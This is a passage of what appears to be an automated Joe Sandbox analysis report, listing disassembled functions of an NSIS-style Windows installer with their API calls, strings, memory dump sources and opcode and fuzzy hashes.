                                                                • lstrcatW.KERNEL32(0042C248,004033B0,004033B0,0042C248,00000000,?,771B23A0), ref: 004054D4
                                                                • SetWindowTextW.USER32(0042C248,0042C248), ref: 004054E6
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                • String ID:
                                                                • API String ID: 2531174081-0
                                                                • Opcode ID: b2af606ead9b863f529dc3152d5ad601cd5d345789467c65e8690d0a39f03baf
                                                                • Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
                                                                • Opcode Fuzzy Hash: b2af606ead9b863f529dc3152d5ad601cd5d345789467c65e8690d0a39f03baf
                                                                • Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8
                                                                Function 00404D22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D3D
                                                                • GetMessagePos.USER32 ref: 00404D45
                                                                • ScreenToClient.USER32(?,?), ref: 00404D5F
                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D71
                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D97
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Message$Send$ClientScreen
                                                                • String ID: f
                                                                • API String ID: 41195575-1993550816
                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction ID: 7205eec21020573454be23e67ac2b5f41aa1c09cc3aa20a5ad054807a565c042
                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                • Instruction Fuzzy Hash: 63014C71900219BADB00DBA4DD85BFEBBBCAF54B11F10012BBA50F61C0D7B49A058BA5
                                                                Function 00402F2B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                • MulDiv.KERNEL32(?,00000064,?), ref: 00402F74
                                                                • wsprintfW.USER32 ref: 00402F84
                                                                • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                Strings
                                                                • verifying installer: %d%%, xrefs: 00402F7E
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                • String ID: verifying installer: %d%%
                                                                • API String ID: 1451636040-82062127
                                                                • Opcode ID: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                • Instruction ID: 5483d255828af9cef8fcdd630f22e0c0956a10275527037d70a62c30cec8c61f
                                                                • Opcode Fuzzy Hash: 5b1bc627dd36a5102c32c12b14091c8dec43231046f13c1edcd0296a8f8e997f
                                                                • Instruction Fuzzy Hash: 29014471640209BBEF209F60DE49FEA3B79FB04344F008039FA06A51D0DBB995559F58
                                                                Function 00406796 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
                                                                • wsprintfW.USER32 ref: 004067E8
                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067FC
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                • API String ID: 2200240437-1946221925
                                                                • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                • Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
                                                                • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                • Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8
                                                                Function 00402947 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                • String ID:
                                                                • API String ID: 2667972263-0
                                                                • Opcode ID: de73b908c18fc613f7e49f3b3831bbe4083507e0fa079f070aaa262aac2e01e7
                                                                • Instruction ID: 6d3b5365c2144e4253305efdfeae8c7c86b7c4bf3cccdf3f9a106f7510f1e1f6
                                                                • Opcode Fuzzy Hash: de73b908c18fc613f7e49f3b3831bbe4083507e0fa079f070aaa262aac2e01e7
                                                                • Instruction Fuzzy Hash: 6121BD71800124BBCF216FA9DE49D9F7E79EF05364F10023AF560762E1CB784D419BA8
                                                                Function 004066C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 00406723
                                                                • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406732
                                                                • CharNextW.USER32(?,00000000,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 00406737
                                                                • CharPrevW.USER32(?,?,771B3420,00442800,00440000,004034A0,00442800,00442800,0040370F,?,00000007,00000009,0000000B), ref: 0040674A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Char$Next$Prev
                                                                • String ID: *?|<>/":
                                                                • API String ID: 589700163-165019052
                                                                • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                • Instruction ID: 9627fccf098e727a5900f08bdddf05a21b4f43d755832024a56349c67539c63f
                                                                • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                • Instruction Fuzzy Hash: F2110D1580061295DB303B548C84A7B62F8EF5879CF52843FED96732C0E77D8C9286BD
                                                                Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00441000,?,?,00000031), ref: 004017B0
                                                                • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00441000,?,?,00000031), ref: 004017D5
                                                                  • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(0042C248,00000000,?,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
                                                                  • Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,0042C248,00000000,?,771B23A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
                                                                  • Part of subcall function 00405479: lstrcatW.KERNEL32(0042C248,004033B0,004033B0,0042C248,00000000,?,771B23A0), ref: 004054D4
                                                                  • Part of subcall function 00405479: SetWindowTextW.USER32(0042C248,0042C248), ref: 004054E6
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
                                                                  • Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                • String ID:
                                                                • API String ID: 1941528284-0
                                                                • Opcode ID: 3bd161d241efa62f67390cbd575096c18e933838bd6aa8ee1fc71e84d96db0bb
                                                                • Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
                                                                • Opcode Fuzzy Hash: 3bd161d241efa62f67390cbd575096c18e933838bd6aa8ee1fc71e84d96db0bb
                                                                • Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D
                                                                Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CloseEnum$DeleteValue
                                                                • String ID:
                                                                • API String ID: 1354259210-0
                                                                • Opcode ID: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                • Instruction ID: 81522b48e592499502658fb4677f1b0f70c545d6b701466da39e5ccb8a756ba0
                                                                • Opcode Fuzzy Hash: 0ef7066dde05a2ca5f9e50454b412eec226e379908bdbcc4328f96335d0522a1
                                                                • Instruction Fuzzy Hash: 0F215A72500109BBEF129F90CE89EEF7A7DEB54344F110076B945B11A0E7B48E54AAA8
                                                                Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                • Instruction ID: ee10c8015a3e92cf614b22ba24180aec604fe5fe026a1179c0e7be4a3fdf0cdb
                                                                • Opcode Fuzzy Hash: 5af5b17495f11576261f65d9e5f109aee1feef29f3286c425d9ce226ac00a781
                                                                • Instruction Fuzzy Hash: E621F672900119AFCB05DFA4DE45AEEBBB5EF08314F14003AFA45F62A0C7789D51DB98
                                                                Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(?), ref: 00401E51
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                • String ID:
                                                                • API String ID: 3808545654-0
                                                                • Opcode ID: a454a8818f399bf65eceb9f254a96b638f729825bbaaf63a9eae57af7bef2038
                                                                • Instruction ID: 39ccdc2dc8d2035913c0323839c6798354fd507b9908b2fcb43e3dcb67b0f82d
                                                                • Opcode Fuzzy Hash: a454a8818f399bf65eceb9f254a96b638f729825bbaaf63a9eae57af7bef2038
                                                                • Instruction Fuzzy Hash: C6019271904240EFE7005BB0EE4AB9A3FB4BB15300F208A3AF141B75E2C6B904458BED
                                                                Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                • Instruction ID: 0f37489a7ff55aa34ce709233052591c61f0789b3923deb1f93634f017c8c928
                                                                • Opcode Fuzzy Hash: fbb483b0c38b2c52992a6a5b7edafa52747ff059505c006a33bc3772956b04e9
                                                                • Instruction Fuzzy Hash: E821AD7195420AAEEF05AFB4D94AAEE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                                                Function 00404C14 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CB5
                                                                • wsprintfW.USER32 ref: 00404CBE
                                                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404CD1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ItemTextlstrlenwsprintf
                                                                • String ID: %u.%u%s%s
                                                                • API String ID: 3540041739-3551169577
                                                                • Opcode ID: f58b41418a4369048050ec28379bfde913e2c2f32864fd6dc5da282de313838b
                                                                • Instruction ID: 33068f1a2098bbc59acf923d0b26dc9f7285eb9428391dcb76f0b5068863668e
                                                                • Opcode Fuzzy Hash: f58b41418a4369048050ec28379bfde913e2c2f32864fd6dc5da282de313838b
                                                                • Instruction Fuzzy Hash: 6A11EB73A041283BEB00656D9D46E9E329C9B85334F264237FA25F31D1E978C82182EC
                                                                Function 00405948 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateDirectoryW.KERNEL32(?,?,00442800), ref: 0040598B
                                                                • GetLastError.KERNEL32 ref: 0040599F
                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
                                                                • GetLastError.KERNEL32 ref: 004059BE
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID:
                                                                • API String ID: 3449924974-0
                                                                • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                • Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
                                                                • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                • Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9
                                                                Function 00402FB1 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(?,00000000,0040318F,00000001,?,00000007,00000009,0000000B), ref: 00402FC4
                                                                • GetTickCount.KERNEL32 ref: 00402FE2
                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F2B,00000000), ref: 00402FFF
                                                                • ShowWindow.USER32(00000000,00000005,?,00000007,00000009,0000000B), ref: 0040300D
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                • Instruction ID: d33bc14a5fcc1787285ca97da28f022d839d2e13e88132ee71d9f244d0d7cdfd
                                                                • Opcode Fuzzy Hash: e942aba91c3d4d0b77748caef32317d1a3e8dc78421a0242562119172c6ce506
                                                                • Instruction Fuzzy Hash: 4AF05E3160AA21ABC6216F10FF0DA8B7B64BB48B41741487AF842B15E9DB740CA1DB9D
                                                                Function 004053ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040541C
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 0040546D
                                                                  • Part of subcall function 004043B3: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                • Instruction ID: 5278ea034fccd8c5818adddfb220a11f4cbf18c481ac084eeec191c980f5e464
                                                                • Opcode Fuzzy Hash: 26e100c8e936244900aacf90f380f9ed614629df6b7f9272593e4765ff02ca63
                                                                • Instruction Fuzzy Hash: F9012C71200609AFDF216F11DD80BDB3B66EB84756F504036FB01752E2C77A8C92DA6E
                                                                Function 00405F36 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00405F54
                                                                • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00440000,004034C3,00442000,00442800,00442800,00442800,00442800,00442800,00442800,0040370F), ref: 00405F6F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1881165369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000009.00000002.1881145956.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881185536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881204163.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000009.00000002.1881233569.000000000047F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_No.jbxd
                                                                Similarity
                                                                • API ID: CountFileNameTempTick
                                                                • String ID: nsa
                                                                • API String ID: 1716503409-2209301699
                                                                • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                • Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
                                                                • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                • Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58
                                                                Function 004059FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                Download Yara Rule
                                                                APIs
